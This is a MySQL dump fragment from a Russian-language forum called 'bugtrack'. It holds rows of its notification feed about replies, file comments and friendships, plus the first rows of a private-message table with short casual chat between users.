INSERT INTO lenta VALUES("146","41","vinkh ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=11&page=\">обсуждении</a>!","comments","1426489464","0","forum11");
INSERT INTO lenta VALUES("147","1","Ambalik оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=5&page=\">обсуждении</a>!","comments","1426489590","0","forum5");
INSERT INTO lenta VALUES("148","57","vinkh ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=5&page=\">обсуждении</a>!","comments","1426489721","0","forum5");
INSERT INTO lenta VALUES("165","51","Оставлено сообщение в новостях проэкта <a href=\"news_of_project.asp?do=open&news=34\">Открытие сайта</a>.","comments","1426497050","0","new34");
INSERT INTO lenta VALUES("150","27","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=12&page=\">обсуждении</a>!","comments","1426490145","0","forum12");
INSERT INTO lenta VALUES("151","1","vinkh ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=12&page=\">обсуждении</a>!","comments","1426490339","0","forum12");
INSERT INTO lenta VALUES("152","27","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=12&page=\">обсуждении</a>!","comments","1426490502","0","forum12");
INSERT INTO lenta VALUES("153","27","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=12&page=\">обсуждении</a>!","comments","1426490515","0","forum12");
INSERT INTO lenta VALUES("154","1","vinkh ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=12&page=\">обсуждении</a>!","comments","1426490649","0","forum12");
INSERT INTO lenta VALUES("155","27","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=12&page=\">обсуждении</a>!","comments","1426490795","0","forum12");
INSERT INTO lenta VALUES("156","27","IronnHeart оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=12&page=\">обсуждении</a>!","comments","1426491097","0","forum12");
INSERT INTO lenta VALUES("157","21","vinkh ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=12&page=\">обсуждении</a>!","comments","1426491711","0","forum12");
INSERT INTO lenta VALUES("158","27","IronnHeart ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=12&page=\">обсуждении</a>!","comments","1426491993","0","forum12");
INSERT INTO lenta VALUES("159","27","<span style=\"color: #250000\">G</span><span style=\"color: #4A0000\">r</span><span style=\"color: #6F0000\">o</span><span style=\"color: #940000\">z</span><span style=\"color: #B90000\">n</span><span style=\"color: #DE0000\">y</span><span style=\"color: #FF0000\">y</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=12&page=\">обсуждении</a>!","comments","1426492029","0","forum12");
INSERT INTO lenta VALUES("164","1","ICE оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=36&p=78&t=14&page=\">обсуждении</a>!","comments","1426496937","0","forum14");
INSERT INTO lenta VALUES("161","1","bypass оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=36&p=78&t=14&page=\">обсуждении</a>!","comments","1426493255","0","forum14");
INSERT INTO lenta VALUES("162","36","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=36&p=78&t=14&page=\">обсуждении</a>!","comments","1426493467","0","forum14");
INSERT INTO lenta VALUES("163","1","bypass ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=36&p=78&t=14&page=\">обсуждении</a>!","comments","1426493886","0","forum14");
INSERT INTO lenta VALUES("168","51","ICE ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=5&page=\">обсуждении</a>!","comments","1426499611","0","forum5");
INSERT INTO lenta VALUES("169","30","<span style=\"color: #250000\">G</span><span style=\"color: #4A0000\">r</span><span style=\"color: #6F0000\">o</span><span style=\"color: #940000\">z</span><span style=\"color: #B90000\">n</span><span style=\"color: #DE0000\">y</span><span style=\"color: #FF0000\">y</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=5&page=\">обсуждении</a>!","comments","1426501141","0","forum5");
INSERT INTO lenta VALUES("170","1","<span style=\"color: #CECA3A\">n</span><span style=\"color: #A9A45E\">a</span><span style=\"color: #847E82\">b</span><span style=\"color: #5F58A6\">1</span><span style=\"color: #3A32CA\">r</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=12&page=\">обсуждении</a>!","comments","1426502254","0","forum12");
INSERT INTO lenta VALUES("171","1","IronnHeart оставил комментарий к Вашему <a href=\"disk/info.php?i=35\">файлу</a>!","comments","1426506113","0","fo35");
INSERT INTO lenta VALUES("174","30","Оставлено сообщение в новостях проэкта <a href=\"news_of_project.asp?do=open&news=34\">Открытие сайта</a>.","comments","1426520291","0","new34");
INSERT INTO lenta VALUES("175","30","TheAlex ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=5&page=\">обсуждении</a>!","comments","1426520320","0","forum5");
INSERT INTO lenta VALUES("176","41","Оставлено сообщение в новостях проэкта <a href=\"news_of_project.asp?do=open&news=34\">Открытие сайта</a>.","comments","1426520847","0","new34");
INSERT INTO lenta VALUES("177","41","ICE ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=5&page=\">обсуждении</a>!","comments","1426520879","0","forum5");
INSERT INTO lenta VALUES("178","1","<span style=\"color: #CECA3A\">n</span><span style=\"color: #A9A45E\">a</span><span style=\"color: #847E82\">b</span><span style=\"color: #5F58A6\">1</span><span style=\"color: #3A32CA\">r</span> добавил в друзья <a href=\"/27\"><img src=\"../bugtrack/img/temman.png\"> <a href=\"/user27\">vinkh</a><span style=\"color: green;\"> [Ст.Мод]</span></a>!","friends","1426523788","0","");
INSERT INTO lenta VALUES("179","27","Теперь вы друзья с <a href=\"/39\"><img src=\"../bugtrack/img/temman.png\"> <a href=\"/user39\"><span style=\"color: #CECA3A\">n</span><span style=\"color: #A9A45E\">a</span><span style=\"color: #847E82\">b</span><span style=\"color: #5F58A6\">1</span><span style=\"color: #3A32CA\">r</span></a></a>!","friends","1426523788","0","");
INSERT INTO lenta VALUES("181","49","ICE оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=96&t=18&page=\">обсуждении</a>!","comments","1426571204","0","forum18");
INSERT INTO lenta VALUES("182","30","lomer ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=96&t=18&page=\">обсуждении</a>!","comments","1426571938","0","forum18");
INSERT INTO lenta VALUES("183","49","ICE ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=96&t=18&page=\">обсуждении</a>!","comments","1426572319","0","forum18");
INSERT INTO lenta VALUES("184","49","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=71&t=17&page=\">обсуждении</a>!","comments","1426575021","0","forum17");
INSERT INTO lenta VALUES("185","49","vinkh оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=71&t=17&page=\">обсуждении</a>!","comments","1426601548","1","forum17");
INSERT INTO lenta VALUES("186","27","<span style=\"color: #CECA3A\">n</span><span style=\"color: #A9A45E\">a</span><span style=\"color: #847E82\">b</span><span style=\"color: #5F58A6\">1</span><span style=\"color: #3A32CA\">r</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=71&t=17&page=\">обсуждении</a>!","comments","1426612983","0","forum17");
INSERT INTO lenta VALUES("189","1","малыш оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=5&page=\">обсуждении</a>!","comments","1426757570","0","forum5");
INSERT INTO lenta VALUES("190","30","Оставлено сообщение в новостях проэкта <a href=\"news_of_project.asp?do=open&news=34\">Открытие сайта</a>.","comments","1426772882","0","new34");
INSERT INTO lenta VALUES("191","27","<span style=\"color: #CECA3A\">n</span><span style=\"color: #A9A45E\">a</span><span style=\"color: #847E82\">b</span><span style=\"color: #5F58A6\">1</span><span style=\"color: #3A32CA\">r</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=71&t=17&page=\">обсуждении</a>!","comments","1426800004","0","forum17");
INSERT INTO lenta VALUES("193","30","IronnHeart оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=19&page=\">обсуждении</a>!","comments","1426855729","0","forum19");
INSERT INTO lenta VALUES("194","30","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=19&page=\">обсуждении</a>!","comments","1426873081","0","forum19");
INSERT INTO lenta VALUES("195","29","<span style=\"color: #CECA3A\">n</span><span style=\"color: #A9A45E\">a</span><span style=\"color: #847E82\">b</span><span style=\"color: #5F58A6\">1</span><span style=\"color: #3A32CA\">r</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=36&p=77&t=20&page=\">обсуждении</a>!","comments","1426898555","0","forum20");
INSERT INTO lenta VALUES("196","30","<span style=\"color: #CECA3A\">n</span><span style=\"color: #A9A45E\">a</span><span style=\"color: #847E82\">b</span><span style=\"color: #5F58A6\">1</span><span style=\"color: #3A32CA\">r</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=19&page=\">обсуждении</a>!","comments","1426898736","0","forum19");
INSERT INTO lenta VALUES("198","21","ICE ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=19&page=\">обсуждении</a>!","comments","1426913261","0","forum19");
INSERT INTO lenta VALUES("200","29","ICE оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=36&p=77&t=20&page=\">обсуждении</a>!","comments","1426913552","0","forum20");
INSERT INTO lenta VALUES("201","1","Veteran оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=36&p=78&t=14&page=\">обсуждении</a>!","comments","1426914725","0","forum14");
INSERT INTO lenta VALUES("202","6","ICE оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=36&p=78&t=21&page=\">обсуждении</a>!","comments","1426916235","0","forum21");
INSERT INTO lenta VALUES("203","30","<span style=\"color: #330000\">N</span><span style=\"color: #660000\">r</span><span style=\"color: #990000\">a</span><span style=\"color: #CC0000\">v</span><span style=\"color: #FF0000\">o</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=19&page=\">обсуждении</a>!","comments","1426917979","0","forum19");
INSERT INTO lenta VALUES("204","7","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=19&page=\">обсуждении</a>!","comments","1426919460","0","forum19");
INSERT INTO lenta VALUES("205","1","foxik оставил комментарий к Вашему <a href=\"disk/info.php?i=33\">файлу</a>!","comments","1426921132","0","fo33");
INSERT INTO lenta VALUES("206","1","foxik оставил комментарий к Вашему <a href=\"disk/info.php?i=32\">файлу</a>!","comments","1426921162","0","fo32");
INSERT INTO lenta VALUES("207","30","<span style=\"color: #250000\">G</span><span style=\"color: #4A0000\">r</span><span style=\"color: #6F0000\">o</span><span style=\"color: #940000\">z</span><span style=\"color: #B90000\">n</span><span style=\"color: #DE0000\">y</span><span style=\"color: #FF0000\">y</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=19&page=\">обсуждении</a>!","comments","1426921338","0","forum19");
INSERT INTO lenta VALUES("208","30","Veteran ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=36&p=78&t=21&page=\">обсуждении</a>!","comments","1426921366","0","forum21");
INSERT INTO lenta VALUES("209","30","IronnHeart оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=19&page=\">обсуждении</a>!","comments","1426921375","0","forum19");
INSERT INTO lenta VALUES("210","30","Veteran оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=19&page=\">обсуждении</a>!","comments","1426921751","0","forum19");
INSERT INTO lenta VALUES("211","72","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=71&t=22&page=\">обсуждении</a>!","comments","1426931295","0","forum22");
INSERT INTO lenta VALUES("212","29","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=36&p=77&t=20&page=\">обсуждении</a>!","comments","1426931334","0","forum20");
INSERT INTO lenta VALUES("213","1","foxik ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=71&t=22&page=\">обсуждении</a>!","comments","1426932166","0","forum22");
INSERT INTO lenta VALUES("214","29","qwerty оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=36&p=77&t=20&page=\">обсуждении</a>!","comments","1426933126","0","forum20");
INSERT INTO lenta VALUES("215","76","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=36&p=77&t=20&page=\">обсуждении</a>!","comments","1426933336","0","forum20");
INSERT INTO lenta VALUES("216","1","qwerty ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=36&p=77&t=20&page=\">обсуждении</a>!","comments","1426933482","0","forum20");
INSERT INTO lenta VALUES("217","1","qwerty ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=36&p=77&t=20&page=\">обсуждении</a>!","comments","1426933539","0","forum20");
INSERT INTO lenta VALUES("218","76","<span style=\"color: #EB2122\">S</span><span style=\"color: #EE3820\">e</span><span style=\"color: #F14F1E\">n</span><span style=\"color: #F4661C\">u</span><span style=\"color: #F77D1A\">s</span><span style=\"color: #FA9418\">e</span><span style=\"color: #FDAB16\">r</span><span style=\"color: #FFC214\">t</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=36&p=77&t=20&page=\">обсуждении</a>!","comments","1426933736","0","forum20");
INSERT INTO lenta VALUES("219","1","qwerty ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=36&p=77&t=20&page=\">обсуждении</a>!","comments","1426936296","0","forum20");
INSERT INTO lenta VALUES("220","29","qwerty ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=36&p=77&t=20&page=\">обсуждении</a>!","comments","1426937997","0","forum20");
INSERT INTO lenta VALUES("221","29","малыш оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=36&p=77&t=20&page=\">обсуждении</a>!","comments","1426939200","0","forum20");
INSERT INTO lenta VALUES("222","76","Apofias ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=36&p=77&t=20&page=\">обсуждении</a>!","comments","1426939514","0","forum20");
INSERT INTO lenta VALUES("223","65","Apofias ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=36&p=77&t=20&page=\">обсуждении</a>!","comments","1426939551","0","forum20");
INSERT INTO lenta VALUES("224","30","<span style=\"color: #CECA3A\">n</span><span style=\"color: #A9A45E\">a</span><span style=\"color: #847E82\">b</span><span style=\"color: #5F58A6\">1</span><span style=\"color: #3A32CA\">r</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=19&page=\">обсуждении</a>!","comments","1426942749","0","forum19");
INSERT INTO lenta VALUES("225","6","<span style=\"color: #CECA3A\">n</span><span style=\"color: #A9A45E\">a</span><span style=\"color: #847E82\">b</span><span style=\"color: #5F58A6\">1</span><span style=\"color: #3A32CA\">r</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=36&p=78&t=21&page=\">обсуждении</a>!","comments","1426942955","0","forum21");
INSERT INTO lenta VALUES("241","80","ICE оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=71&t=24&page=\">обсуждении</a>!","comments","1427400662","0","forum24");
INSERT INTO lenta VALUES("227","6","ICE ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=19&page=\">обсуждении</a>!","comments","1426951765","0","forum19");
INSERT INTO lenta VALUES("240","6","<span style=\"color: #CECA3A\">n</span><span style=\"color: #A9A45E\">a</span><span style=\"color: #847E82\">b</span><span style=\"color: #5F58A6\">1</span><span style=\"color: #3A32CA\">r</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=19&page=\">обсуждении</a>!","comments","1427374593","0","forum19");
INSERT INTO lenta VALUES("230","6","<span style=\"color: #CECA3A\">n</span><span style=\"color: #A9A45E\">a</span><span style=\"color: #847E82\">b</span><span style=\"color: #5F58A6\">1</span><span style=\"color: #3A32CA\">r</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=19&page=\">обсуждении</a>!","comments","1426963679","0","forum19");
INSERT INTO lenta VALUES("232","30","<span style=\"color: #330000\">N</span><span style=\"color: #660000\">r</span><span style=\"color: #990000\">a</span><span style=\"color: #CC0000\">v</span><span style=\"color: #FF0000\">o</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=19&page=\">обсуждении</a>!","comments","1427004575","0","forum19");
INSERT INTO lenta VALUES("233","19","ICE оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=96&t=23&page=\">обсуждении</a>!","comments","1427114094","0","forum23");
INSERT INTO lenta VALUES("234","30","XaPzZ ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=96&t=23&page=\">обсуждении</a>!","comments","1427189104","0","forum23");
INSERT INTO lenta VALUES("235","19","ICE ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=96&t=23&page=\">обсуждении</a>!","comments","1427203677","0","forum23");
INSERT INTO lenta VALUES("236","30","XaPzZ ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=96&t=23&page=\">обсуждении</a>!","comments","1427210963","0","forum23");
INSERT INTO lenta VALUES("237","6","<span style=\"color: #CECA3A\">n</span><span style=\"color: #A9A45E\">a</span><span style=\"color: #847E82\">b</span><span style=\"color: #5F58A6\">1</span><span style=\"color: #3A32CA\">r</span> ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=19&page=\">обсуждении</a>!","comments","1427301082","0","forum19");
INSERT INTO lenta VALUES("239","19","<span style=\"color: #CECA3A\">n</span><span style=\"color: #A9A45E\">a</span><span style=\"color: #847E82\">b</span><span style=\"color: #5F58A6\">1</span><span style=\"color: #3A32CA\">r</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=96&t=23&page=\">обсуждении</a>!","comments","1427374007","0","forum23");
INSERT INTO lenta VALUES("242","30","xkat ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=71&t=24&page=\">обсуждении</a>!","comments","1427418009","0","forum24");
INSERT INTO lenta VALUES("243","39","XaPzZ ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=96&t=23&page=\">обсуждении</a>!","comments","1427545111","0","forum23");
INSERT INTO lenta VALUES("244","80","TheAlex оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=24&page=\">обсуждении</a>!","comments","1427688596","0","forum24");
INSERT INTO lenta VALUES("245","80","<span style=\"color: #250000\">G</span><span style=\"color: #4A0000\">r</span><span style=\"color: #6F0000\">o</span><span style=\"color: #940000\">z</span><span style=\"color: #B90000\">n</span><span style=\"color: #DE0000\">y</span><span style=\"color: #FF0000\">y</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=24&page=\">обсуждении</a>!","comments","1427783653","0","forum24");
INSERT INTO lenta VALUES("246","29","<span style=\"color: #330000\">N</span><span style=\"color: #660000\">r</span><span style=\"color: #990000\">a</span><span style=\"color: #CC0000\">v</span><span style=\"color: #FF0000\">o</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=36&p=77&t=20&page=\">обсуждении</a>!","comments","1428009929","1","forum20");
INSERT INTO lenta VALUES("247","30","<span style=\"color: #330000\">N</span><span style=\"color: #660000\">r</span><span style=\"color: #990000\">a</span><span style=\"color: #CC0000\">v</span><span style=\"color: #FF0000\">o</span> оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=19&page=\">обсуждении</a>!","comments","1428009963","0","forum19");
INSERT INTO lenta VALUES("248","7","ICE ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=19&page=\">обсуждении</a>!","comments","1428117187","0","forum19");
INSERT INTO lenta VALUES("249","39","Veteran ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=19&page=\">обсуждении</a>!","comments","1428149551","1","forum19");
INSERT INTO lenta VALUES("250","131","Frank_Sorkut оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=37&p=97&t=26&page=\">обсуждении</a>!","comments","1437762785","0","forum26");
INSERT INTO lenta VALUES("251","155","Frank_Sorkut оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=96&t=27&page=\">обсуждении</a>!","comments","1437817773","0","forum27");
INSERT INTO lenta VALUES("252","120","Noldor ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=96&t=27&page=\">обсуждении</a>!","comments","1437820245","0","forum27");
INSERT INTO lenta VALUES("253","65","Оставлено сообщение в новостях проэкта <a href=\"news_of_project.asp?do=open&news=34\">Открытие сайта</a>.","comments","1437853823","1","new34");
INSERT INTO lenta VALUES("254","101","Теперь вы друзья с <a href=\"/94\"><img src=\"../bugtrack/img/temman.png\"> <a href=\"/user94\">xbit</a><span style=\"color: green;\"> [Разр]</span></a>!","friends","1437856320","0","");
INSERT INTO lenta VALUES("255","160","xbit оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=75&t=28&page=\">обсуждении</a>!","comments","1438021464","0","forum28");
INSERT INTO lenta VALUES("256","160","xbit оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=75&t=28&page=\">обсуждении</a>!","comments","1438021652","0","forum28");
INSERT INTO lenta VALUES("257","160","xbit оставил сообщение в Вашей <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=75&t=28&page=\">обсуждении</a>!","comments","1438021678","0","forum28");
INSERT INTO lenta VALUES("258","94","Kaban ответил на Ваш комментарий в <a \n\nhref=\"bugtrack/index.php?do=them&r=31&p=75&t=28&page=\">обсуждении</a>!","comments","1438066984","0","forum28");
DROP TABLE IF EXISTS `letters`;
CREATE TABLE `letters` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`who` int(11) NOT NULL DEFAULT '0',
`idwho` int(11) NOT NULL DEFAULT '0',
`message` blob NOT NULL,
`data` char(20) DEFAULT '0',
`read` smallint(1) DEFAULT '0',
`mod` char(1) NOT NULL DEFAULT '',
`save` smallint(1) NOT NULL DEFAULT '0',
`file` char(50) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=595 DEFAULT CHARSET=utf8;
INSERT INTO letters VALUES("1","1","5","Привет :D","1420265379","1","i","0","");
INSERT INTO letters VALUES("2","5","1","Привет :D","1420265379","1","o","0","");
INSERT INTO letters VALUES("3","5","1","привГг","1420265730","1","i","0","");
INSERT INTO letters VALUES("4","1","5","привГг","1420265730","1","o","0","");
INSERT INTO letters VALUES("5","1","5","ну что скажешь? :D","1420265843","1","i","0","");
INSERT INTO letters VALUES("6","5","1","ну что скажешь? :D","1420265843","1","o","0","");
INSERT INTO letters VALUES("7","5","1","нормГг","1420265862","1","i","0","");
INSERT INTO letters VALUES("8","1","5","нормГг","1420265862","1","o","0","");
INSERT INTO letters VALUES("9","1","5",":D старался Гг","1420265923","1","i","0","");
INSERT INTO letters VALUES("11","5","1","гоу обмен реклой?","1420267639","1","i","0","");
INSERT INTO letters VALUES("12","1","5","гоу обмен реклой?","1420267639","1","o","0","");
INSERT INTO letters VALUES("13","0","1","Пользователь <img src=\"../bugtrack/img/temman.png\"> <a href=\"/user5\">Asadal</a> поставил Вам <a href=\"avtoritet.php?do=history&nk=1\">плюс</a>!","1420268200","1","i","0","");
INSERT INTO letters VALUES("14","1","5","окей","1420275064","1","i","0","");
INSERT INTO letters VALUES("15","5","1","окей","1420275064","1","o","0","");
INSERT INTO letters VALUES("34","6","1","http://blog.worldbyte.net/editprofile.asp","1420283892","1","o","0","");
INSERT INTO letters VALUES("35","6","1","НЕ ВЫХОДИТ и с R и без","1420283951","1","i","0","");
INSERT INTO letters VALUES("36","1","6","НЕ ВЫХОДИТ и с R и без","1420283951","1","o","0","");
INSERT INTO letters VALUES("37","1","6","<span style=\"color: #FF0000;\"><b>[censored]</b></span>","1420284111","1","i","0","");
INSERT INTO letters VALUES("38","6","1","<span style=\"color: #FF0000;\"><b>[censored]</b></span>","1420284111","1","o","0","");
INSERT INTO letters VALUES("33","1","6","http://blog.worldbyte.net/editprofile.asp","1420283892","1","i","0","");
INSERT INTO letters VALUES("17","0","1","Пользователь <img src=\"../bugtrack/img/temman.png\"> <a href=\"/user6\">Veteran</a><span style=\"color: green;\"> [Адм]</span> поставил Вам <a href=\"avtoritet.php?do=history&nk=1\">плюс</a>!","1420282907","1","i","0","");
INSERT INTO letters VALUES("18","6","1","бро советую как то выделить уведомления а то что то приходит не сразу замечаешь!","1420283301","1","i","0","");
INSERT INTO letters VALUES("19","1","6","бро советую как то выделить уведомления а то что то приходит не сразу замечаешь!","1420283301","1","o","0","");
INSERT INTO letters VALUES("20","6","1","апаааа","1420283316","1","i","0","");
INSERT INTO letters VALUES("21","1","6","апаааа","1420283316","1","o","0","");
INSERT INTO letters VALUES("22","1","6","Какое уведомление?","1420283338","1","i","0","");
INSERT INTO letters VALUES("23","6","1","Какое уведомление?","1420283338","1","o","0","");
